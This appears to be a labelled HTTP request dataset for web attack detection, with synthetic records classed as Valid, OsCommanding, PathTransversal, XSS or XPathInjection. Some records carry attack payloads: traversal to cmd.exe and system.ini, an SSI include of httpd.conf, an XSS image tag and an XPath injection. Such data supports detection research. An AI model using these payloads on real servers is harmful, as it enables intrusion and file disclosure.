Referer: /eoqwlLp/ejin4c/e0w9mre.js
TE: chunked
Trailer: Cache-Control
User-Agent: eotsioe/3.7.2.3
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: identity
Upgrade: rsiehy/1.3, 29tde/2.6, oilqm/3.1
Warning: 748 223.214.209.242 "ttmlx0H5" "Fri, 19 Feb 10 21:58:45 CET"
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 65625
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31014
Start - Id: 44198
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ailG.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: koi8;q=0.1
Accept-Encoding: 
Accept-Language: i-0hYtwe5;q=0.1, terasoi-ai0wmvrc
Cache-Control: no-cache
Client-ip: 130.86.46.202
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Thu, 28 Jan 10 09:00:54 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Tue, 09 Mar 10 14:19:14 CET
If-Unmodified-Since: Sat, 07 Jul 07 01:16:07 CET
If-Match: "djRGMp.zNHqbNUGOqNq"
If-None-Match: *
If-Range: Fri, 09 Apr 10 04:27:39 CET
Max-Forwards: 5
MIME-Version: 8.7
Pragma: tt=tpaiftrd
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: tens eeiuotsu=h1utu
Range: 22399-
Referer: /toeeH/n65cn7/Soeootec.swf
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: Mozilla/9.7 (X11; U; Solaris 6.5; or-tp; rv:8.7.3) Gecko/48641245
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 700 www.yhebtw99.tiff "Igi9im" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44198
Start - Id: 35926
class: PathTransversal
POST /tDt/kreIQ1nTBDBCtNNI/rzd/emwar8sshtktis9/sDNm9i1Plj.html? HTTP/1.0
Content-Length: 238
Content-Language: sCbhedy
Content-Encoding: compress
Content-MD5: eGF0a0lwVHJlcnU0c25OdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 17 Oct 06 13:56:08 GMT
Host: 79.140.202.150
Connection: close
Accept: application/x-tar;q=0.2, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Client-ip: 250.38.166.171
Cookie: guato=panewget
Cookie2: $Version="489"
Date: Fri, 18 Jul 08 11:49:26 CET
If-Modified-Since: Mon, 08 Mar 04 10:52:53 UTC
If-Match: *
Max-Forwards: 25
Pragma: loIaonnw='nlqurba'
Referer: /hiuxna/sspct/uLsw.cgi
TE: gzip,chunked
User-Agent: Snel/0.9.6

otns=rixiusrctnon92&TtiB=993&SB_taC=aun&nbptadDecaee=mcl):tetyyefi8&0Ed2eor6hteh=ahraynlink&1UfadphpAshutdownu=<!--#include     virtual="/etc/httpd/httpd.conf" -->&catnAF=eYhntA5tx1oi&ieeI=2380&rgWUOukdS.TF=cDRl0OE

End - Id: 35926
Start - Id: 20164
class: Valid
GET /owsonl75rhme/Y4IIH6fwZUUKYdb/eoldortxroea/9f2E/c8vci3cvTpasswdo1aEJ.css?wcso6=eion&@sbVk3=wrpYd5Dj&zFv-y2=etcb+p%5D+t&iue=%7Ef&P62aornoths=06&sxMs7IiF=ttgxn%25sylulr&t3rsTfsbtD=f%26+1hllR%25stmp%27oem+xi&fhoist2=7&g_scriptBG1xwhereL8=aesi&l9b4e9=eah%26npucghnrl&flh9nobtzc=kstie&ejiannoeM6htnsc=5842709317&gH8ULnoKLtl=0ttts6eno45Vgthaae&2n0moyT=3P9AD2&mimnuaj9=nMlD18kC HTTP/1.1
Host: 25.113.17.122
Connection: keep-alive
Accept: audio/x-wav;q=0.8, video/quicktime
Accept-Charset: iso-8859-8-i, x-mac-arabic;q=0.7, windows-1252;q=0.6, iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: neEvhjo-Tn8sne;q=0.7, oo0h-shSy72Ph;q=0.0
Cache-Control: only-if-cached
Client-ip: 99.135.103.152
Cookie: vh=I;rtTstaTt4=ehbacek7gtln6;-EUHJ9lTO=zmninputs
Cookie2: $Version="553"
Date: Sun, 06 Jul 08 11:59:27 GMT
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: eo6noy
From: sb62@aupq5s0rh.st
If-Modified-Since: Tue, 13 Sep 05 01:54:12 UTC
If-Unmodified-Since: Mon, 24 Nov 08 21:09:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Aug 05 07:53:28 GMT
Max-Forwards: 44
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: NTLM ZXRodGVpdDdjaXR5blJlRjUwYm90bElkZmU5dGliZWNhUm5u
Range: 365749-,607-065
Referer: /sHci.bin
TE: gzip,trailers
Trailer: Warning
User-Agent: tTNiJiP http://www.heiLsW.net
UA-CPU: PowerPC
UA-Disp: 972,951,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 297x878
Via: FTP/0.0 26.234.112.57, gNaroE/5.4 www.6un6bt.css:5, HTTP/3.0 www.pjog.htm
Transfer-Encoding: deflate
Upgrade: 5to/3.5
Warning: 804 223.86.45.215 "nulraOi9titRoel" "Wed, 09 Dec 09 07:48:07 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20164
Start - Id: 2935
class: Valid
GET /bu2aan8egdastnidIso/lATteudN1ee0oV4e5zmP/enn/sehfxoe.htm?oalwdruj94yr=eeecho+%3E&b7.qWHS8h0D=%5Bae7e%7Eeyrfh&b8Rz3cr=Ejo%3Fnr&aciehTfbaBsa=iegtnastts6h&MNvUZz3@6phpr=n+open&t7gc=65521&6ntm7=32882&Ysock_streamswhere@=ta%29documentreplace%29hacceptAL%3Cqtnktdiil HTTP/1.1
Host: www.l6txtE.fr
Connection: yNny
Accept: image/*, application/rtf, audio/*
Accept-Charset: koi8;q=0.3
Accept-Encoding: identity;q=0.6, identity, gzip;q=0.2, compress
Accept-Language: p-thspme;q=0.7, no-euTwnqe;q=0.8, eswso-hiialcag
Cache-Control: only-if-cached
Client-ip: 235.117.179.157
Cookie: 8nmySc0=87433627;qrjl1rhyen2a=9878323;sem2phse7t=r;Eamueatrdnitu=h2X3CYksh;4Wz.dropDRu=58650
Cookie2: $Version="4"
Date: Sun, 05 Feb 06 04:51:30 UTC
ETag: "A-367QW-qbH4e9vzMAm"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Thu, 29 Nov 07 24:09:22 GMT
If-Unmodified-Since: Wed, 02 May 07 17:49:05 CET
If-Match: *
If-None-Match: "pTUFI.VF6NPH852@DMrv"
If-Range: *
Max-Forwards: 847
MIME-Version: 2.7
Pragma: eRi8uE=Thleo
Proxy-Authorization: Digest algorithm=rieTn
Authorization: drrm se7ankhj=irs5
Range: 88640-9956,7533-4307
Referer: /hs0ae3Ob/pfdsgfa.mspx
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/4.0 (compatible; csemsTsh; Mac OS X; AsELnd; pTots; TcbnOeibl)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 202x8189
Via: HTTP/7.3 www.ihreso9u.jpg
Transfer-Encoding: compress
Upgrade: r9ilss/9.8, hesns/3.7, rklr/3.0, ns4e/6.2, N1ttes/5.7
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 53.203.246.70
X-Serial-Number: 677820
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2935
Start - Id: 1964
class: Valid
GET /aVx1bzeHu7.css? HTTP/1.1
Host: www.t0krS.be
Connection: keep-alive
Accept: application/postscript;q=0.6, image/*
Accept-Charset: iso-8859-5;q=0.3, windows-1257
Accept-Encoding: 
Accept-Language: IaImn-j, Rtq-8mh;q=0.7, 28e-sqc3aE6n;q=0.9, EySq4eaI-eeirt, 9eq-7vrlL;q=0.0
Cache-Control: only-if-cached
Client-ip: 93.59.198.99
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="3"
Date: Tue, 04 May 04 02:37:13 UTC
ETag: W/"plLBmnTpaJzgnQ."
Expect: ioriht=n0uemi
From: ebeitt4@hsle.fr
If-Modified-Since: Sun, 13 May 07 12:35:47 UTC
If-Unmodified-Since: Sat, 24 Feb 07 08:16:03 GMT
If-Match: *
If-None-Match: "TLu7wZXmpCUcjt1P4E"
If-Range: "k76ITeuH3mvh0f2"
Max-Forwards: 6
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: NTLM ZXNOaXNkZXI4MWFhdHRtYWl2dHNJdG55ZWFpdHFvZXNkNDQzZHVpZFk=
Range: 907906-,4755-184
Referer: http://www.jsro.cz/iewhSw/nto7rA/cdtteir/SfTg/4brQeh.mdb
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: bYG3nK http://www.tseau324.de
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: 6.3 www.Hemrc1th.html
Transfer-Encoding: gzip
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 246 144.242.96.229 "zhitriestohvafi" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1964
Start - Id: 26543
class: Valid
GET /cxhf2rNtlepyzhha.php4?cotgs=7869&rutoliU9A3uordt=cennode7%7E%268aotaoA&edms6rwecvsAg=1&gt8ynquoeslaso=khtaccesewheredOsxrt-p%2Fho&QV6U-idobjectnodeW=heUonsim&1documentzORpsXeZf=4taOhacktlni&sefheei=uut0eo9ehde&s8=y%25settl&ncCPc=E&Mr=ojJcW0dD HTTP/1.1
Host: 167.41.254.186
Connection: close
Accept: video/*;q=0.2, video/*;q=0.5, text/html
Accept-Charset: windows-1250;q=0.3, windows-1253, iso-8859-9;q=0.0, gb2312;q=0.7
Accept-Encoding: *
Accept-Language: loaerte-uak2ol6, iynyueo5-nO9d, etj0eM-ts1a4, e0fe-krlax1ig, s-hwnSga;q=0.4
Cache-Control: only-if-cached
Client-ip: 58.210.234.19
Cookie: WLtb=1;FhobjectunioneI2e8=dsyTseeuaunosp;formyxp_WShSF=04126;Ihuy8itrzvcit=o@htpass=o;eeh1
Cookie2: $Version="58"
Date: Tue, 06 Sep 05 19:42:15 UTC
ETag: "oYWDHE-qWf8q0qbJ"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Sun, 14 Feb 10 11:06:50 GMT
If-Unmodified-Since: Fri, 23 Oct 09 01:10:20 CET
If-Match: "I00j74vLKqj@pN2.wqSy"
If-None-Match: "8G-JRae_sIgsQ3_6pCg"
If-Range: *
Max-Forwards: 31
MIME-Version: 1.9
Pragma: eIep=sglbdr
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: 9769-87960,68614-
Referer: http://Ent2ms.ch/5sa5ur/osiseo/Nneqt/AtIk.html
TE: gzip;q=0.9,deflate
Trailer: Accept-Encoding
User-Agent: hduenvi/4.4
UA-CPU: PowerPC
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: 9.8 25.29.146.133:68049, 3.9 www.dtschi.gif
Transfer-Encoding: identity
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 248 51.93.56.9 "9mucan7xiiw9go4ettes" "Sat, 18 Mar 06 14:43:39 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26543
Start - Id: 47592
class: XSS
GET /b@Ce/0BtPQ2VW/rimGta9/r-adTJ_LdTo/olQ9ml1x/iER/s4MkKLT/eqewmkcdjtuxearpsolb/p9tx4tvoanmzn/pNH0NIMxwJaLE8M/xEsgitrrg/bH.exe?ohhfniisihpNai=%3Cimg+++src%3D%26%7B%5Balert+%28%27srEin%27%29%3B%5D%7D%3B%3E&od5haaedrie=809&etrvwt2teufln=J9t&agpeunear3ghrt=3954624&ed38slir3oAoa=2&scCr=iUYm%406Ku HTTP/1.1
Host: www.iaeaardt.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Fri, 12 Sep 08 20:22:27 UTC
ETag: W/"k.NJardhH9CSLO.eFKv"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Tue, 18 May 04 16:37:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5675
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: http://sy7e9o.com/oigfArb/srvsxin/nprRkpe/acntenI.swf
TE: deflate,trailers,chunked
Trailer: If-None-Match
User-Agent: memhlhatv/2.0.5
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 428x2370
Via: 8eln3n/1.4 www.anntb.js
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47592
Start - Id: 20295
class: Valid
GET /ecFjTxvF0N65ngafr/hTmhv5.exe?6h6qd9To=567373&sbirgot=ri&he8katJJ=sio+hnqacnqoh&toq2hXc6iO3=lubfus&ikSYxmlLlocation=1745455711&egoi=m%40t+ HTTP/1.0
Host: www.wiesaiu.net
Connection: vkyste
Accept: text/plain, video/quicktime;q=0.5, application/*;q=0.3
Accept-Charset: utf-8, windows-1254;q=0.4, iso-8859-4;q=0.0
Accept-Encoding: *
Accept-Language: tncelsgn-e
Cache-Control: only-if-cached
Client-ip: 235.128.217.246
Cookie: CFe5anettyh=71624651
Cookie2: $Version="4"
Date: Sat, 29 Jan 05 02:27:23 GMT
ETag: W/"idK2rQ563WzVLVCFlS"
Expect: tetn18re=iUidv
From: l7liin@ale3msnh.uk
If-Modified-Since: Mon, 05 Jun 06 16:40:32 CET
If-Unmodified-Since: Thu, 22 Mar 07 05:57:26 UTC
If-Match: *
If-None-Match: *
If-Range: "Sp8T07h--@9mEH6DW"
Max-Forwards: 08
MIME-Version: 5.4
Pragma: Nn=etSels
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Digest username="velhSN0n"
Range: 8-31,-2,-9878
Referer: http://www.amsiuirT.it/eeDrsui/wto8ae/ourao/awn3t/1oednS0.swf
TE: chunked;q=0.3,trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 3.3; Td-ls; rv:5.2.2) Gecko/44536099
UA-CPU: PowerPC
UA-Disp: 4132,883,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 5.6 www.Eatet.tiff
Transfer-Encoding: compress
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20295
Start - Id: 22806
class: Valid
GET /eY_Gcq/aAZpdk/HkNeTkguvzUr/n0drYFIndR/ln9hGaHa8uEoerds/oI/wqsaoOniLgzwdnn3ry/Dls3IiZE/locationmS./foX7byY9hPPU.jpg?Ts=480114523&ft3=cgErmhjt&eediA=txVKTK3X-ic&gli6B=n+&bAa=cari&noaz8e7i=eorrasieies HTTP/1.0
Host: www.uen3eetgt.uk
Connection: close
Accept: */*
Accept-Charset: euc-jp, windows-1254, shift_jis;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 173.3.239.168
Cookie: lteeen=72;s7Eivcr=3
Cookie2: $Version="219"
Date: Thu, 10 Sep 09 24:10:57 UTC
ETag: W/"f8e9UZiElt_NQiWS"
Expect: 100-continue
From: Ar5ho@jaaeat.fr
If-Modified-Since: Mon, 16 Jan 06 09:31:14 CET
If-Unmodified-Since: Fri, 14 Aug 09 03:59:27 UTC
If-Match: "-BQ1_1vr4nGnuKuP4Cn"
If-None-Match: *
If-Range: Fri, 27 Jun 08 07:45:34 CET
Max-Forwards: 0
MIME-Version: 9.2
Pragma: dwhl='r'
Proxy-Authorization: NTLM cnJvbmhocDhlZXhpRVN0MW5vZWk5Y21wdGF0Z3RjYXdldDR3ZQ==
Authorization: NTLM U3RhZXNjbzlyZWVhYnpyb2FFem9uaGVlaW5lTHJkbTdhbjVtbnRlbG5o
Range: -637
Referer: http://www.gmwon.it/iieos0ky/stionii.php4
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (compatible; Konqueror/3.4; WinNT; nekD; f6rneR; nmhdletAn5)
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: HTTP/2.1 www.bliv5Es.tiff
Transfer-Encoding: identity
Upgrade: nlNDj/4.6
Warning: 552 www.2namiaEo.jpg:01754 "eaywa5bed" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 3049600663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22806
Start - Id: 45111
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.hleeln.it
Connection: jecjo
Accept: audio/*;q=0.3, application/*;q=0.0, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.161.164.98
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="148"
Date: Wed, 15 Apr 09 09:05:20 CET
ETag: W/"8yGmGypk0PQXmLHhmg"
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: "VKlMpA-0g@tRIzgGXFG"
Max-Forwards: 41
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Digest nonce
Range: -3,456-488022
Referer: http://grsthbdr.st/5fsucsh.wav
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 9.9; ht-ze; rv:0.1.6) Gecko/01253869
UA-CPU: StrongARM
UA-Disp: 9898,841,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 213x015
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: compress
Upgrade: ifi/1.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45111
Start - Id: 50054
class: XPathInjection
POST /cmrthjnylt/iPA84S0kFkJbA0nplYa/o5eoefhahbtp/72wN0SfnHgBi-fh8/Midesss/5N2qsT@QBoqRJ1hzsXd/h61a/bMZeNtVkhxoUi/xvn/amW7XmSMkgpswV.jpeg? HTTP/1.0
Content-Length: 181
Content-Language: iay
Content-Encoding: compress
Content-Location: http://www.ruace.it/yecnXe.mp3
Content-MD5: aWl5bzJpZHN0cjluZWFtaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jun 05 08:10:52 UTC
Last-Modified: Sat, 23 Jun 07 11:54:07 GMT
Host: www.iee2a.cz:5
Connection: close
Accept: audio/basic, image/jpeg, video/mpeg
Accept-Charset: iso-8859-7, iso-8859-7;q=0.1, big5
Accept-Encoding: *;q=0.8
Accept-Language: lr-nls1cas;q=0.4, sowE-gzbswmg0;q=0.5, deoEe-a3acaeel;q=0.8, Azr-ad;q=0.8, ysal-Hd;q=0.6
Cache-Control: min-fresh=8
Client-ip: 219.186.60.132
Cookie: Fuxg=aZJGoiOp5uVa;ocu7=un;aofwEIafio=m]bn+;62vh=2998454303;nynuaaIlbtstil=631    or   1<   2ie/e/lw1s7f/child::text()[position()=557]     or    9='] | /* | /foo[bar='
Cookie2: $Version="644"
Date: Fri, 18 May 07 18:31:03 CET
ETag: "AQZ5z3@UY7Pqgl1l@yA"
Expect: 100-continue
From: dtlece@N4narCi.fr
If-Modified-Since: Sun, 16 Aug 09 12:17:01 UTC
If-Unmodified-Since: Sat, 04 Dec 04 06:10:28 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Feb 06 01:58:46 UTC
Max-Forwards: 00
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aUVzZWFvbWlhZWVja3N0bHNBdWJ0YUVRZ3VDMW5hcnJkbmt5SHA=
Range: -58,57-31,47896-392874
Referer: http://www.ktrnl.gov/ay2ea/ernr.js
TE: chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.1 (compatible; eTnN4aK; Win98; 1d8doqf5f; cE2wmo; nlnis8dti)
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: 1.7 152.222.242.23, 4.5 www.LRernr.jpg, FTP/6.1 www.ldtt.js
Transfer-Encoding: compress
Upgrade: 6Kna1/5.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 4431106659344342
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

Ietc7ivmb8ct=674245&isz=lhdthqeduRt5cbs&QwherewgetvU=465&EtdIgnlAayta=naoiframenciihesi+&hedpnnahjosEuRt=oe'hw&s11cf4y=90278&side5tmnpaXveei=eUm4yhp&tnl0szhc=uhTi&ZtZEeOSd=21799

End - Id: 50054
Start - Id: 12985
class: Valid
GET /eG3QnMMH/Lq0u/aaeqhd/UuI-bX43AVK2f/oIf2mgM4yU/l0nC2NA/DusreZ5gYKwOSOh/tIHs/T@uPPrips/.2zqZmocha4/lMTj/8-UVQHFT.gkH..jpg?T1L.img=c&fn8n=62776&oaee5aeeeeet2op=cy7HMk&Yidc=+L&ranstiwstHqnsth=Bf+zi6igw%26e&aerdoatl=%25amaill%7C%3C+servicesl&rr3anaareXrloei=5cv.M_L%40e&z7fwiy=eyeomtlH&aglsClas=i8jr2kxXOIg&naie1nsysurs=janrtg&iTxteurnxeloet7=ruOn0e&zkieeoiR=nna8%40%3Cr-i&nceotm5chsaiwet=avrdure&eeurt=3 HTTP/1.1
Host: www.esnny.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: shift_jis, x-mac-korean;q=0.0, iso-2022-kr, windows-1252, iso-8859-15
Accept-Encoding: *;q=0.8
Accept-Language: et8oR-sffi;q=0.2, nc1w5-ec5hqyeT;q=0.5
Cache-Control: min-fresh=3290
Client-ip: 36.28.31.243
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="3"
Date: Mon, 21 Jul 08 05:51:14 GMT
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Wed, 04 Oct 06 10:35:03 GMT
If-Unmodified-Since: Thu, 04 Dec 08 02:44:16 CET
If-Match: "nV4C4hNh1N4Yqysd1"
If-None-Match: "oRrungw30jF8yAkQu"
If-Range: *
Max-Forwards: 4
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: Basic bWR1ZTpjdGFl
Range: 459-
Referer: /trnceev.swf
TE: gzip,deflate
Trailer: Upgrade
User-Agent: Mozilla/5.8 (compatible; MSIE 8.9; Mac OS X; a8colve)
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 752x029
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: ucsd
Upgrade: iyr/1.7, i8et/9.1, hhek/1.3
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 39169260132979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12985
Start - Id: 13287
class: Valid
GET /ykO/amk1fjM-8zQ8Tp/5IC70FIsystemlv/ifZybetween_HUdUKw/Brcpobjectq.sj0ZqbodyDe3g/whraDOoWaeEx/ip9ueeUE/KLLYDhttpwMR.php4?Sywoquu1osoRt=akeccee3fh45aoeaoh HTTP/1.0
Host: 26.252.230.86
Connection: keep-alive
Accept: video/mpeg;q=0.0, audio/*
Accept-Charset: ks_c_5601-1987;q=0.7, shift_jis;q=0.1, cp-950;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16937
Client-ip: 85.166.25.79
Cookie: etwrwfnciv5=hh?t;datSdt6=l2wtocniAset7;eFSsutqmohn3sa=0257611;vcsihobn=betReC;6stEsarrteist=ean
Cookie2: $Version="790"
Date: Thu, 01 Apr 04 05:40:19 CET
ETag: "Png5k5U7@BuLTwZig@"
Expect: skddonh=etN1a
From: loIhgsv1@fslilws3bn.com
If-Modified-Since: Wed, 23 Jun 04 24:01:58 GMT
If-Unmodified-Since: Tue, 29 Dec 09 11:07:19 CET
If-Match: "peMPWI3.a1TcyRM"
If-None-Match: *
If-Range: "823D.J43cB2dVs-Mj"
Max-Forwards: 1
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: ogcs 19tiTz=67xf
Range: 91-,95-043440
Referer: /h8u1bbe8/dahtstaS/osofncv/eaterpn/nojaloc1.gif
TE: chunked;q=0.3,deflate;q=0.0
Trailer: Pragma
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 5.3; Eq-yh; rv:6.3.2) Gecko/98984910
UA-CPU: Sparc
UA-Disp: 3770,9157,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1944x150
Via: 2.1 31.149.165.160, FTP/2.0 www.nmII.gif
Transfer-Encoding: 9icrt
Upgrade: tys/4.9, uRbUmS/4.9, mus/8.8, CpW/2.8, hhur/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 152.52.206.24
X-Serial-Number: 6280790959
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13287
Start - Id: 33442
class: Valid
PUT /rfhn/t4E/VdNY0Ij.aZse1@/gtCD/tdie2rlrcrne/iZ9t0mivSHd@ZYIx/Y6ote5xKm/evalrbgsound7.iS.js? HTTP/1.1
Content-Length: 166
Content-Language: hIitee
Content-Encoding: identity
Content-Location: http://www.toanFr3.ch/eubne/rlii0.msf
Content-MD5: bnRqbklpZW5sZXlldThNeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 24:59:16 CET
Last-Modified: Mon, 26 May 08 03:41:54 UTC
Host: 29.161.111.89:73962
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.3, gb2312;q=0.8, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 192.144.253.244
Cookie: orbeoolweatxoy=1lc8;zbeo=uCuImo3;3d@orXnodecmdD6E=07;mm=310442
Cookie2: $Version="6"
Date: Fri, 17 Feb 06 19:59:42 CET
ETag: "lv0nA.ltI3PTp.u2hX"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Mon, 02 Oct 06 02:38:20 GMT
If-Unmodified-Since: Tue, 09 Sep 08 11:53:12 CET
If-Match: "g2WdpuVdlCIcuje@rP2"
If-None-Match: *
If-Range: Wed, 15 Jul 09 01:26:48 CET
Max-Forwards: 14
